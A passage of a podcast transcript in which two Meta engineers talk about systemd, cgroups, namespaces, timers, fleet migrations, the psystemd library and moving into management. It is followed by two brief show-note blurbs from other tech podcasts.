manage the resources between different groups of processes, which is how systemd does its services. [00:18:33] Alvaro: So a, a control group will allow you to impose restrictions on how each system uses the resources, right? So with a cgroup, you can say, only use 20% of cpu, and the, and the kernel will take care of that. Uh, while namespace it is basically how you view the system around you. So like your mount directory like, like where does your home points to? that's, I would say it's more on the namespace side of things. So one is the view then one is the actual, the restrictions. And like Anita said, like systemd does a very clever thing. It doesn't have two, is not the. It's not why cgroups exist, but every time that you start a systemd service, systemd will create a cgroup for that service and will put every process in that cgroup, even though all cgroups would end up being the same, for instance. But eh, you can now like have a consolidated list of what process belong to a service. So a simple question like, like what services has my Apache web service started? That's show you how old I am. But yeah, you can answer that now because you just look at the cgroup, you don't look at the process tree. [00:19:42] Jeremy: So it, it sounds like the, the namespacing is maybe more for the purposes of security, like you said, giving you a certain view of your, your system. and the cgroups are more for restricting resources, but also, like you said, being able to see what are all the processes, um, are associated. Um, so that you, you don't have a process that spins up other processes and then you don't know who owns those, and then you don't know how to shut 'em all down. That, that takes care of that for you. [00:20:17] Alvaro: So I, I always reluctant to use the word security or privacy. I would like to use the word isolation. Yeah. And then if people want to impose the idea of security and privacy to those, that's fine, but it's, but it's mostly about isolation. [00:20:32] Anita: Yeah. Namespaces are what back all the container technologies are. Anytime you run things in a container, it's probably using some kind of name spacing. But yeah, you, you kind of hit the nail in the head. Isolation versus like resource control [00:20:46] Alvaro: As Anita just said that's what fits on containers, uh, namespaces and cgroup like a big mix of those. But that doesn't mean that the only reason why those things exist are for containers. You can take advantage of those technologies without actually having to think of a container. systemd timers vs cron [00:21:04] Jeremy: Something you had mentioned a little bit earlier is, is how systemd has other features and one of them was, was timers. And I was kind of curious, cuz you said you could, you wanna schedule a job, you can run it using cron or you can run it using systemd timers. And it, I feel like whenever I see people scheduling jobs, they're always talking about cron but, but not so much about systemd timers. So I was curious if you had any thoughts on that. [00:21:32] Anita: I don't know. I feel like it's used pretty interchangeably these days. Um, like even when people say cron they're actually running a systemd timer with the cron format, for their time. [00:21:46] Alvaro: So the, the advantage of of systemd timers over cron is, is basically two, right? The first one it is that, you get more control on the time, right? So you have monotonic and absolute times, right? Which is basically like, you can say like this, start five minutes after the previous run. Or you can say this, start after five minutes after the vote, right? So those are two type of time, that is the first one, uh, which may be irrelevant for most people, but that's it. Uh, the other one is that you actually have advantage over the, you take full advantage of systemd, right? In current you say run this process, right? And how that process run, it's basically controlled by the process itself, right? So if you, uh, like if the crontab is for the user, that's good for you, but if you want to like nice it or make it use less cpu, that's what it is. Well, with systemd you say, This cron will start the service and the service, you take full fledged advantage of all the things a service can do. [00:22:45] Jeremy: From what I could tell, looking at the, the timers api, it, it felt like it would be a lot easier to kind of see when things ran, get, you know, get a log of, I ran this time job and it, it failed. Um, it seemed like systemd had a lot more kind of built in to, to kind of look into that. but, uh, yeah, like Anita was saying, like when you, you hear kind of cron all the time, but like you said, maybe it's, maybe they're not actually using cron all the time. They're just saying cron [00:23:18] Alvaro: Well, I would say this for cron like the, the time, the time, uh, syntax for it, it's pretty, it's pretty easy to understand, even though I never remember where, I remember where weekday is, right? The fourth, which one is which? [00:23:32] Jeremy: I, I'm with Anita. I need to look it up whenever I'm gonna use it. (laughs) [00:23:36] Anita: Yeah. I use a cron translator when I have to use cron format. [00:23:41] Alvaro: This is like, like a flags to tar, right? Like, I never remember which, which flags to put. [00:23:48] Anita: Yeah, that's true. [00:23:50] Alvaro: We didn't talk about this, we haven't talked about systemd-run, but one of the advantages of the, one of the advantages of using timers is that you can schedule them on demand, right? So like cron if you wanna schedule something over time, you need to modify the cron the cron file. Uh, and that's, it's problem right? With systemd, you can have like ephemeral units and so you can say like, just for now, go and run this process five hours from now. Like, and after that, just forget about it. [00:24:21] Jeremy: Yeah, the, during the workshop you mentioned systemd-run and I hadn't even heard of it. And after I saw that I was like, wow, this, this could be really useful. [00:24:32] Alvaro: It is quite useful. How have things changed at meta? [00:24:34] Jeremy: One of the things you had mentioned, I, I guess you've, you've been at Meta for, for quite a while and you were talking about how you started with having all these scripts you were running on CentOS 6 and getting off of that to something more standard. I wonder if you could speak a little bit to that, that process. Like what did things look like then and, and how have they they changed over the years? [00:25:01] Alvaro: I would say the following thing, right? Like Anita said, like for most engineers, the day to day of things don't really change that much, because this is foundational things, right? So if you have to fundamentally change the way that you run applications every couple of years, then you waste a lot of time, right? It's not the same as you say, like react where, or, or in the old days, angular where angular one, angular two, angular three, and then it's gone, right? Like, so, so I, I would say it like for the average engineers things don't change that much, uh, for the other type of engineers, like, like us who we, who that we really care about, like how things run. like having a, an API where you can like query the state of your service. Like if like asking like, is my service running with an API that returns true or false, that is actually like a volume value that you can like, Transferring in your application, uh, that, that helps a lot on, on distributed systems. a lot of like our container infrastructure that we use internally at Meta is based on a lot of these ideas and technologies. [00:26:05] Anita: Yeah, thinking back to the CentOS 6 to 7 migration, I wasn't on like the any operating systems team at the time, but I was working with them and I also was on a team that had to migrate, figure out how to migrate our scripts and things over. so the one thing that did make it easy is that the OS team, uh, we deploy all our things using Chef. Maybe you've heard like Puppet and Ansible, that's our version, the Open Source Chef code. Um, and they wrote some really good documentation on how to migrate, from Runit, which is what we were using before to systemd. it was. a very large scale effort across multiple teams to kind of make sure their stuff works, do the OS upgrade and then get used to using systemd. [00:26:54] Jeremy: And so the, the team who is performing this migration, that's not the product team. That would be the, is it production engineering? Is that, is that what you called that? [00:27:09] Alvaro: So, so I was at the other side of, of that, of that table where I, the same as Anita, we were doing the migration more how most things work at Facebook is that it's a combination of the team that is responsible for the technology and the teams who uses the technology. Right. So we are a company, so we. Can like, move together. it's the same thing when you upgrade kernels. Most of the time the kernel team will do the effort to upgrade the kernels, and when they hit a roadblock or something, they will call for the owner of the service and the owner of the service can help debug uh, for the case of CentOS 6 and CentOS 7, eh, I was the PE at Instagram P Stand for Production Engineer. I was the PE at Instagram who did most of the migration of our fleet. So I, I rewrote most of the things because I understand how our things work, and the OS team provide like the support to understanding like, like when can I use some things, when can I use not other things. There was the equivalent of ChatGPT at those days, right? I was just ask them how to do stuff. They will gimme recipes. so, so it it's kind of like, like a mix, uh, work, uh, between those two teams. Uh, Anita, maybe you can talk a little bit about what you talk when you were upgrading the version of systemd and you found a bug? [00:28:23] Anita: Oh, the, like regular systemd upgrades nowadays? I, I'd say it's a lot easier these days. I mean, since the, at the time when we did the CentOS 6 to 7 migration, it was like, our fleet was a lot more fragmented. I'd say nowadays it's a lot more homogenous, which makes, which makes it easier. yeah, in the early versions there were some kind of obscure like, interactions with the kernel or like, um, we, we make pretty heavy use of systemd to run our container system. So, uh, if we run into any corner cases, um, like pretty obscure stuff sometimes, because we make pretty heavy use of the resource control properties. we usually those end up on the GitHub tracker, things like that. [00:29:13] Alvaro: That's the side effect of hiring very smart people. They do very smart things that are very hard to understand. (laughs) [00:29:21] Jeremy: That's kind of an interesting point about you, you saying you're using these, these features, you know, of the kernel very heavily because, you're kind of running your own infrastructure, I think even your own data centers, so you're kind of forced to go to this level, it sounds like just because of the sheer number of services you're running and the fact that like, you have to find a way to pack 'em all onto the same machine. Does that, does that sound right? [00:29:54] Anita: Yeah, I'd say at, at our scale, like it's more cost effective to act, own the servers and run all everything on it ourselves versus like, you know, leasing from, uh, AWS or something, which we've also explored in the past. But that also means we need more engineers to build and run things on our servers. [00:30:16] Jeremy: Yeah. So the, the distinction between, let's say you're a, a small company or a mid-size company and you pay AWS or, or Google to, to do your hosting for you, then you may not necessarily get exposed to a lot of the, the kernel level problems or even the Linux user space problems because you're, you're working at a higher level and that's why you don't necessarily encounter those kinds of things. [00:30:46] Anita: I'd say not, not necessarily. I think, once you get even like slightly lower in the stack where you're just like on your own server, Then you will want to start really looking into like what systemd's doing, how does it interact with other, uh, services, um, on your server, and how can you like connect these different features together? [00:31:08] Alvaro: One of the things that every developer who who works like has to worry about is log right, and that, and that's the first time that you actually start interacting with systemdata available, right? So you have to understand, like maybe it's not just tail /var/log foo, but log right. Maybe it's just journalctl and it's like, what? But yeah. [00:31:32] Jeremy: Yeah. That's a good point too about whenever you're working with the operating system, like you're deploying onto a Linux machine. Regardless of the distribution, if you're the person who's responsible for that, you, you need to know this stuff. Right. Otherwise it's kind of like, you're just putting stuff out there and hoping for the best. Yeah. [00:31:54] Alvaro: Yeah. There, there's also another thing that, I dunno if I've said this before, but, a lot of the times you don't have to know these technologies, but knowing them will help you do your work better. [00:32:05] Jeremy: Yeah, totally. I mean, I think that that applies to pretty much anything in, in development, right? I, I've heard often that some people will say, you take the level that you work at currently and then kind of just go down one level. Right. And then, so you can kind of see what's underneath that. And you don't necessarily need to keep digging, cuz eventually if you keep digging, you're getting into, you know, machine instructions and whatnot. But, um, Yeah, maybe just one level is, is good to, to give you a better sense of what's happening. Production engineers need to go lower in the stack to be able to debug applications [00:32:36] Alvaro: Um, every time that I, that I, that somebody ask me like, what is the difference between a PE and a SWE, uh, software engineer, production engineer, typical conference, uh, one of the biggest difference that I, that I say is that a PE would tends to ask a lot of questions going the same thing that you're saying, we're trying to go down the stack, right? And I always ask the following question, eh, do you know how time dot sleep is implemented? Right? Do you like, like if you, if you were to see time dot sleep on your Python program, like do you actually know what is doing under the hood, right? Is it a while true? While the time, is it doing a signal interrupt? Is it doing a select on a file descriptor with a timeout? Like what is it doing? would you be able to implement it? And the reason why I say this, because like when you're debugging an application, like somebody something's using your cpu, right? And then you see that line on your code, you. You can debug every single line of your code. But also there's a lot of value to say like, no time.sleep doesn't cause CPU to spike. Right. Because it's implemented in a way that it would not be possible to do that. Meta's linux user space team [00:33:39] Jeremy: Another thing that I think might be kind of interesting to talk about is, so Meta has this Linux user space team. And I, I wonder like including your role in it, but just as a whole, like what does that actually mean day to day? Like, what are the kinds of problems people are facing that, a user space team would be handling? [00:34:04] Anita: Hmm. It's kind of large cuz now that the team's grown out to encompass a few other things as well. But I'll focus on the Linux user space part. the team started off, on the software engineering side as the systemd developer team. So our job was really to contribute to the community. and both, you know, help with, problems and bugs that show up in upstream, um, while also bringing in new features, that we think would be useful both at Meta and to like, folks, in the Linux community as a whole. so we still play a heavy role in, systemd. We also support it, uh, within the fleet, like we roll out new releases and things like that. but we're also working on a few other projects in. User space. Um, BP filter is one of them, which is, uh, how can we convert like IP tables and network filtering, into BPF programs. Um, on the production engineering side, they focus a lot on, the community engagements. So in addition to supporting CentOS they also handle, or they like support several packages in Fedora, Debian and other distributions, really figuring out how we can, be a better member of the open source community, and, you know, make connections there and things like that. [00:35:30] Jeremy: And, and what was your, your process for getting in involved with this team? Because it sounded like maybe it either didn't exist at the start, or it was really small and, and now it's really, really grown. [00:35:44] Anita: So I was kind of the first member of like the systemd team, if you would call it that. Um, it spun out of containers. So my manager at the time, who's now my director, was he kind of made a call out on workplace looking for people who'd be willing to, contribute to systemd. He was, supporting the containers team at the time who after the CentOS 7 migration, they realized the potential that systemd could have, making their jobs a lot easier when it came to developing the container backend. and so along with that, they also needed someone to help, you know, fix bugs, put in new features and things that would, tie into the goals of the containers team. Um, and eventually now our host management team, I was the first person who reached out to him and said, Hey, I wanna give this a try. I was on the security team at the time and I always had dreams of going back into like, operating systems development and getting better at it. So yeah, that's kind of how I ended up in this space. A few years later, he decided, Hey, we should build a team and you should like hire some people who will also do this with you and increase our investments in systemd. so that's how we kind of built out the Linux user space team to encompass systemd and more like operating system, projects. Working on the internal security team vs the linux userspace team [00:37:12] Jeremy: And so when you were working on the security team before, was that on software internal to meta or were you also involved with, you know, the open source, user space side as well? [00:37:24] Anita: That was all internal at the time. Which was kind of a regret because there was a lot of stuff that I would've liked to talk about externally. But I think, moving to Linux user space made me realize like, oh, there's so much more potential in open source projects, in security, which is still like very closed source from our side. [00:37:48] Jeremy: And, and so like in your experience, what have been some of the big differences? I mean, definitely getting to talk about it is a big one. but like in terms of your day-to-day, what are the big differences between working on something internal versus something that that's open source? [00:38:04] Anita: I have to talk more with external folks. we're, pretty regular members of like the systemd like conclave sync that we have with the other upstream maintainers. Um, Oh yeah. There's a lot more like cross company or an external open source community building that we have to do. it kind of puts into perspective like how we manage our time and also our relationships versus like internally, like everyone you work with works at Meta. we kind of have, uh, some shared leadership at the top. it is a little faster to turn around, um, because, you know, you can just ping people on work chat. But the, all of the systems there are closed source. So, um, there's not like this swath of people outside that you can ask about when it comes to open source things. [00:38:58] Jeremy: You can't, can't look in, discord or whatever for questions about, internal meta infrastructure to other people. It's gotta be. all in the same place. Yeah. [00:39:10] Anita: Yeah. And I'd say with like the open source projects, there's a lot of potential to tap into, expertise and talent that just doesn't exist internally. That's what I found really valuable, cuz people have really great ideas outside as well. Um, and we should like, listen to them and figure out how to build that into their systems and also ours Alvaro's work at meta [00:39:31] Jeremy: And, Avaro, I don't know when you first started, was that on internal, infrastructure and tooling as well? [00:39:39] Alvaro: Yeah, so, um, my path is different than Anita and actually my path and Anita doesn't share any common edges. so I, I don't work at the user space or the Linux kernel or anything. I always work in teams adjacent to it. Uh, but. It's always been very interesting to know these technologies, right? So I started working on Instagram and then I did a lot of the work in containers in migrations at where, where we build psystemd and also like getting to know more about that technologies. We did, uh, a small pilot on using casync which is a very old tool that like, it's only for the fans, (laughs) it's still on systemd repository, I dunno if that's used or anything, but it was like a very cool idea of how to distribute images. Uh, and in Instagram we do very fast deployments. So we deploy, or back then we used to deploy the source code, of Instagram every seven minutes, right? So every seven minutes, every time that a developer did commit to master, uh, we pushed that into production in less than an hour and we did that every seven minutes. So we were like planning to, to use those technologies for that. Um, And then I moved to another team inside of Meta, which is called Cloud Foundation, where we do a lot of like cloud infrastructure, uh, like public cloud. Uh, that's the area, that is very much not talked much about. but I keep like contributing to, to like this world. never really work on, on, on those teams inside of Meta. [00:41:11] Jeremy: So I guess it's your, your team is responsible for working with the engineers who work on product to be able to take their code and, and deploy it. And it's kind of like you work in combination with the user space team or the systemd team to make sure that what you're doing can be supported by them. Is that kind of an accurate description? [00:41:35] Alvaro: Yeah, that's, that's, that's definitely not an exhaustive description, but yeah, that's the, we, we, we do that. Public cloud at meta [00:41:42] Jeremy: It's interesting that you're, you're talking about public cloud now. So when you move to public cloud, are you using VMs kind of like you would in a data center, or is it, you're actually looking at the more managed services and things like that? [00:41:57] Alvaro: So I'm gonna take a small detour and say like, something that is funny. When I got hired by Facebook, we were working on Instagram. So Instagram was just an acquisition for, for, for meta right. And Instagram ran on AWS. So why wasn't the original team who were moving stuff from AWS into the internal data centers at Meta? On the team that I work now, uh, we work to support workloads that cannot run on meta infrastructure either for legal reasons, or for, for practical reasons. Right, because we don't have the hardware, uh, capability or legal resource because the government ask us, like, this cannot be on, on your data center or security, right? We don't wanna run this, this binary that we don't understand on our network. We do want to work in isolation. and the same thing that Anita was saying, where their team are building the common ways of using these tools, like systemd, and user space. we do the same thing, but for using cloud technologies. So in a way that is more similar to meta. So that's the detour now the, to answer your actual question, uh, we do a potpourri of things, right? So since we manage infrastructure and then teams deploy their code, they are better suited to know how their code, gets to run. Uh, with that said, we do have our preferred ways of how you would run stuff. and it's a combination of user containers, uh, open source containers, and and also like VMs There's a big difference between VMs and meta and in public cloud [00:43:23] Jeremy: So it, it sounds like in this case, you're, you're still using VMs even in public cloud, so the way that you do deployments, the location is different, but the actual software and infrastructure that you're running is, is similar. [00:43:39] Alvaro: So there's there's a lot of difference. Between the two things, right. So, the uniformity of hardware at Facebook, or our data centers, makes deploying things very simple, right? while in, in the cloud, you first, you don't get that uniformity because everybody like builds their AMIs as, as they want to build it. But also like a meta, we use, one operating system, in the cloud, you are a little bit more free of what you want. And one of the reasons why you want to go to the cloud is because you can run stuff on. On, on, on the way that that meta will run. Right? So, so even though we have something that are similar, it's not as simple like, oh, just change your deployment from like this data center to like whatever us is one think you would run. [00:44:28] Jeremy: Can, can you give an example of something where you wouldn't be able to run it on Meta's, image that they would choose to go to public cloud to run a different image for? [00:44:41] Alvaro: So, um, so in, in general, like if the government ask us, like, this is not necessarily like, like the US government, right? So, and like if the government ask us like, hey, like you need to keep this transaction on, on our territory, right? for logs, for all the reasons, for whatever, right? like, and, and we wanted to be in the place, we would have to comply. And that's where we will probably use this, this kind of technologies security is another one that is pretty good. And the other one, it is like, in it general, like, like, uh, like disaster recovery, right? If, if meta is down in a way where we cannot communicate with each other using metas technologies, right? Like you would need to have like a bootstrap point. [00:45:23] Jeremy: Is, is it the case where you are not able to put, uh, meta's image up into public cloud? Because you were, The examples you gave was more about location, right? Where you're saying we need to host in public cloud because it needs to be in this country, but then I think you were also saying the, the actual images you would use on AWS right. Would be. I don't know, maybe you'd be using Amazon Linux or maybe you'd be using a different, os entirely. And is that mainly because you're just not able to deploy the same images you have, uh, in-house? [00:46:03] Alvaro: So in, in, in general, uh, this is kind of like very hard to to explain, but, but, uh, if, if we would have to deploy code to a, machine and that machine would, would, would be accessed by people who are not like meta employees and we have no way of getting them to sign NDAs then we would not deploy meta code into that machine. Uh, because that's Sorry. No, not Pi PI's personal information. I was, uh, ip, sorry, that's that's the word. Yeah. Yeah. [00:46:31] Jeremy: So, okay. So if there's, so if you're in public cloud, there's certain things that you just won't put there just because. Those are only allowed to run on Metas own infrastructure. [00:46:44] Alvaro: Yeah Meta's bootcamp [00:46:44] Jeremy: Earlier you were talking about Instagram was an acquisition and they were in AWS were, were you there at the time or you joined, after? [00:46:54] Alvaro: No, I joined. I joined after I joined to, to meta. The way that Meta does hiring, at least for my area, is that you get hired as a production engineer, but you don't get assigned to a team. So you go through a process called boot camp where you get to try different teams and figure out what things you like. I try a couple of different teams, turns out that I like it to work at the Instagram. [00:47:15] Jeremy: And so at that time they were already running on Facebook's internal infrastructure and they had migrated off of AWS [00:47:24] Alvaro: We were on the process of finishing that migration. [00:47:28] Jeremy: So by the time you were there, yeah. Basically get, getting everything out of AWS and then into meta's internal. [00:47:35] Alvaro: Yeah. And, and, and everything is, is a very hard terms to, to define. Uh, I would say like, like most of all, like the bulk of things we were putting it in inside, like, at least what we call our Django servers. Like they were all just moving into internal infrastructure. How Anita started [00:47:52] Jeremy: This kind of touches on the, the whole boot camp thing, but, Anita, I saw that you, you interned at Facebook and then you took a position there, when you ended up taking a position, I'm kind of curious what were the different projects you looked at or, or how did you end up settling on the one you chose? [00:48:11] Anita: Yeah, I interned, um, and I joined straight out of university. I went into bootcamp similar to Alvaro and I got the chance to explore several different teams. I knew I was never gonna do UI that was just like not my thing. Um, so I focused, uh, my search on all like backend infrastructure teams. Um, obviously security, uh, was one of them because that's the team I was in interning on. Um, I also explored, the kind of testing infra team. we call it sandcastle. It runs our internal like unit tests and things. and I also explored one of the, ads infrastructure backend teams. so it was mainly just, you know, getting to know the people, um, seeing which projects appealed to me the most. Um, and then, you know, I kind of chose based on that, I, I think I've always chosen. My work based on how interesting the project sounded, uh, which has worked out in my favor as far as I could tell. How Alvaro started [00:49:14] Jeremy: How, how about, you Alvaro what were the, the different projects you looked at when you first started? [00:49:20] Alvaro: So, As a PE you do have a more restrictive, uh, number of teams that you can, that you can join. Uh, like I don't get an option to work in ui. Not that I wanted, but, (laughs) I, I, it's, it's so long ago. Uh, I remember I did look at, um, at MySQL as a team, uh, that was also one of the cool team. Uh, we had at that time, uh, distribute, uh, engine, uh, to, to run work, like if, like celery or something like that. But internally, I really like the constable distribute like workloads, um, and. I can't remember. I think I did put, come with the Messenger team, that I, I ended up having like a good relationship with their TL their tech lead, uh, but never actually like joined that team. And I believe because she have me have a, a PHP task and it was like, no, I'm not down for doing PHP [00:50:20] Jeremy: Only Python. Huh? [00:50:21] Alvaro: Exactly. Python. Python. Because it's just above C level. Psystemd [00:50:27] Jeremy: I mean related to that, you, you started the, the psystemd project. And so I wonder if you could explain what the context behind that was. Like what sparked I need to make this, this library? [00:50:41] Alvaro: So it's, it's a confluence of two things. The first one, it is like, again, if I see something that doesn't have a Python API for it, I. Feels the strong urge to create one. I have done this a couple of times, mostly internally, but also externally. that was one. And when, while we were doing the migration, I, I, I honestly, I really hate text processing. So the classical thing was like, if you wanna know if your application's running, you do systemctl, you shell out to systemctl status, then parse the output, find the, find the status column. Okay. And I didn't like that. And I start reading about like, systemd uh, and I got in contact with the or I saw like the dbus implementation of systemd. And that was, I thought that was a very interesting idea how that opened all the doors. Right? Uh, so I got a demo working like in a couple of hours. and then I said like, okay, now how do we make this pythonic? And then I created that and I just created, again, just for migrating Instagram. That was the idea. Then, uh, one of the team members who work with Anita, but also one who doesn't work with us anymore, they saw this and said like, Hey, like this looks like a good thing to open source it. So it was like, sure, like I'm happy to opensource it. So we opensource it and then we went to all System Go, which is a very nice interesting conference that happened in Berlin where like all the head for like user space get together. and, and I talk about it and people seems to like it, and that's the story of that. [00:52:15] Jeremy: And so this was replacing, I guess, like you were saying, a lot of people were shelling out and running cat commands and things like that from their Python scripts. And this was meant to be a layer on top of that. [00:52:30] Alvaro: Yes. So it, it does a couple of things. So first of all, inspecting the processes or, or like the services, getting that information out. That's one of the main usage. But also like starting or stopping or like doing all that operations that you want to do. Uh, knowing the state of, of, of services, uh, that's also another thing that people take advantage of. The other thing that people take advantage of is to modify the status of the, of the processes at runtime, like changing properties, like increasing or decreasing the CPU threshold. because systemd provides a very nice API or interface to modify the cgroups properties that otherwise you would need to kind of understand the tree structure that, uh, that, that whatever. so that's what people tend to use this mostly internally. [00:53:23] Jeremy: And so it, it sounds like at least on the production engineering side, you're primarily working in, in Python. is that something that's the teams before were using Python and so everybody just continues using Python? Or is there kind of like more structure or thought put into that? [00:53:41] Alvaro: I would say the following thing about it, um, like in in general, uh, there's, there's not a direction on which language you should use. It's pretty natural which language you should use, but with without said, there's not a Potpourri of languages inside of, of meta. most teams use c c plus plus Python and rust and that's it. There's go, that appears every once in a while there. Sorry, I should not talk about this like, like, or talk like this about this, but eh, there are team who are actually like very fond of go and they use it and they contribute a lot to that space. It's just not. That much, uh, use internally. I have always gravitated towards Python. That has been the language that teach me how to do real coding. and that's the language that got me a job at meta. So I tends to work mostly on that. Yeah. [00:54:31] Anita: Hey, you forgot hack Alvaro. Our web services. (laughs) [00:54:37] Alvaro: Yes. Yes. Uh, so I would say like, the most used language at Meta is actually PHP it's just like used by, by one particular product. That, that is the Facebook product. Yes. So our, our entire web interface, eh, or web stack uses a combination of hack, which is a compiled php, which is better than uncompiled php, also known as vanilla php. Uh, there is a lot of like GraphQL, React, and, I think that's it. [00:55:07] Anita: Infrastructure is largely like c plus plus Python, and now Rust is getting a huge following as well. [00:55:15] Alvaro: Yeah. Like, like Rust. Rust is, I I would say it's the fastest growing language inside, inside of Meta. And the thing is that there is also what you call like the bootstrap problem. Um, there's like today, if I wanted do my python program and I have a function that fails one every three times, I can add a decorator that is retry, that retries every time that something fails for a timeout, right? And that's built in and it's there used and it's documented. And I can look at source code that uses this to understand how, how works. When you start with a new language, you don't get the things. So people have to build them. So there's the bootstrap problem. [00:55:55] Jeremy: That's also an opportunity as well, right? Like if you are the ones building sort of the foundations, then you, you have an opportunity to be the ones who have the core libraries that people are, are using every day. Whereas if a language has been around a while, it's kind of, some of that stuff is already set, right? And you may or may not like the APIs, but that's what people use. So that's what we, that's what we do. One of the last things I'd kind of like to ask, so Anita, you moved into management in just the last year or two or so, and I'm kind of curious what your experience has. Been like, was that a conscious decision where you wanted to go from engineering, uh, software engineering to management? Or maybe you could talk a little bit to that. [00:56:50] Anita: Oh man, it hasn't even been a year yet. I feel like so much time has passed already. Uh, no, I never had any plans to go into management. I love being an engineer. I love being in the code. but, I'd say my, my current manager and uh, my director, you know, who hired me into the Linux user space team, kind of. Sold me a little bit on the idea of like, Hey, if you wanna like, keep pushing more projects, you wanna build out the team that you wanna see working on these things, um, you can consider going into management, taking it slow in a, what we call a T L M role, which is like a tech lead manager, role where you kind of spend some time doing development, and leading the team while also supporting, the engineers as a manager doing the hiring and the relationship building and things that you do in management. so that actually worked out quite well for me, despite Alvaro shaking his head at first. I really enjoyed being able to split my time into kind of the key projects that I really wanted to work on, um, while also supporting the engineers and having them build out, um, New features in systemd and kind of getting their own foothold in the community as well. but I'd say like in the past few months, it's been pretty crazy. I, I probably naively thought that I'd have a little more control over, I don't know. My destiny has a manager and that's like a hundred percent not true. (laughs) Um, you're, you are kind of at both the whims of your engineers and also the people above you. And you kind of have to strike that balance. But, um, my favorite part still, just being able to hide the nasty stuff away from the engineers, let them focus on their work and enjoy what engineers wanna do best, which is just like coding, designing, and like, you know, doing fun, open source stuff. [00:58:56] Alvaro: I will say like, Anita may laugh about me for, because like she's on the other side, but one thing that I least I find very cool at Meta is that managers are not seen as your boss. Right? They're still like a teammate who just basically has a different roles. This is why like when you're an engineer, you can transition to be a manager and that's, it's not considered a promotion that's considered like a, a like an horizontal step and vice versa, you can come back, right. from a manager into, into like an engineer. Yeah. [00:59:25] Jeremy: That was what I would say. And, uh, I guess when you were shaking your head, I'm guessing this means you, you don't wanna become a manager anytime soon. [00:59:35] Alvaro: So I, I never closed the door on that, but I was checking my head to the work of a tlm. Right. Uh, so the tlm TL stands for Tech Lead and m stands for manager. so you're basically both, but with the time of only one. So, uh, Anita was able to pull it off. I don't think I would be able to pull up like, double duty on that. [00:59:56] Anita: Yeah. Unfortunately I support too many people now to do the TL stuff as deeply as I used to, but I still have find some time to code a little bit here and there. [01:00:09] Jeremy: So you were talking a little bit about how things have been crazy the last few months. If, if someone is making the transition into management, like what are the kinds of things that you would tell them to, to look out for or to be aware that's coming? [01:00:27] Anita: Um, when I, before I transitioned, I talked to a lot of managers about like, oh, what was like, you know, the hardest part about management. And they all have kind of their own horror story about what happened to them when they transitioned or even like, difficult things that happened to them during management. I'd say don't expect it to be easy. you're gonna make a lot of mistakes usually in like the interpersonal relationship side, and it's really just about learning how to learn from your mistakes, pick back up and do better next time. I think, um, you know, if people like books, the Making of a Manager by Julie Jo, she was a designer, and also a manager, at then Facebook. She's no longer here. but she has a really good book on like what you can expect when you transition into management. the other thing I'd say is don't go into management without having a management chain that you can really trust. I'd say that can kind of make or break your first few years as a manager, whether you'll enjoy it or not, or even like whether you'll be able to get through the hard times. [01:01:42] Jeremy: Good point. Yeah. I mean, I think whenever you take on anything new, right? Having the support of the people above you or just around you as well is like, that makes such a big difference, right? Even like the situation can be bad, but if everyone is supportive, then you can, you can get through it. [01:02:02] Anita: Yeah, that's absolutely right. [01:02:04] Jeremy: I think that's a good place to wrap up unless either of you have anything else that you thought we should have talked about. so if people want to check out what you're working on, what you're up to, um, how can they find you? [01:02:20] Anita: well, I guess we're both on matrix now. Uh, I'm Anita Zha on Matrix, a n i t a z h A. we both have Twitters as well. If you just search up our names. Nope. Yeah, you're on Twitter. Yeah. [01:02:36] Alvaro: There is an impostor with my name, right? Actually it's not an impostor. It's just me. I just never log into Twitter anymore. [01:02:40] Anita: We both have Mastodon now as well? Yes. Fosstodon we're both frequently at conferences as well. what's, what's coming up next? I think it's, uh, devconf cZ in the Czech Republic. and then, uh, all systems go in September. [01:02:57] Alvaro: You sent something in Canada? [01:03:01] Anita: Oh, yeah. L F F L F S M M B P F is coming up. That's a, that's more of a kernel conference, though. [01:03:09] Alvaro: An acryonym that is longer than the actual word. Yes. Yeah. [01:03:12] Jeremy: That's a lot. That's a lot of letters. [01:03:14] Anita: It's a, it's a mouthful. (laughs) [01:03:18] Jeremy: That's very neat that you get to, to kind of go to all these different conferences and, and actually get, to meet the people in, in person that are, you know, working with the same things you are and, get to be in the same room. I think that's a, that's a real privilege. Yeah. [01:03:35] Anita: Yeah, for sure. [01:03:38] Jeremy: All right. Well, Anita and Alvaro, thank you so much for chatting with me today. [01:03:43] Alvaro: Thank you for hosting. [01:03:45] Anita: Yeah. Thanks for the opportunity. This is a lot of fun.
Josh and Kurt talk about namespaces. They were a topic in the last podcast, and resulted in a much much larger discussion for us. We decided to hash out some of our thinking in an episode. This is a much harder problem than either of us expected. We don't have any great answers, but we do have a lot of questions. Show Notes Not Red Hat NPM hash package Episode 129 – The EU bug bounty program
ZFS Optimization Success Stories, Linux Namespaces Are a Poor Man's Plan 9 Namespaces, better support for SSH host certificates, Fast Unix Commands, Fascination with AWK, and more NOTES This episode of BSDNow is brought to you by Tarsnap (https://www.tarsnap.com/bsdnow) and the BSDNow Patreon (https://www.patreon.com/bsdnow) Headlines ZFS Optimization Success Stories (https://klarasystems.com/articles/zfs-optimization-success-stories/) Linux Namespaces Are a Poor Man's Plan 9 Namespaces (https://yotam.net/posts/linux-namespaces-are-a-poor-mans-plan9-namespaces/) News Roundup We need better support for SSH host certificates (https://mjg59.dreamwidth.org/65874.html) Fast Unix Commands (https://alexsaveau.dev/blog/projects/performance/files/fuc/fast-unix-commands) Fascination with AWK (https://maximullaris.com/awk.html) Beastie Bits [Development environment updated and working])https://twitter.com/sweordbora/status/1618603990463438851?s=52&t=GHrPlL6qZhIWo6u2Y5ie3g) [WIP] feat: add basic FreeBSD support on Kubelet](https://github.com/kubernetes/kubernetes/pull/115870) Jar of Fortunes (http://fortunes.cat-v.org/) Tarsnap This weeks episode of BSDNow was sponsored by our friends at Tarsnap, the only secure online backup you can trust your data to. Even paranoids need backups. - Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv (mailto:feedback@bsdnow.tv)
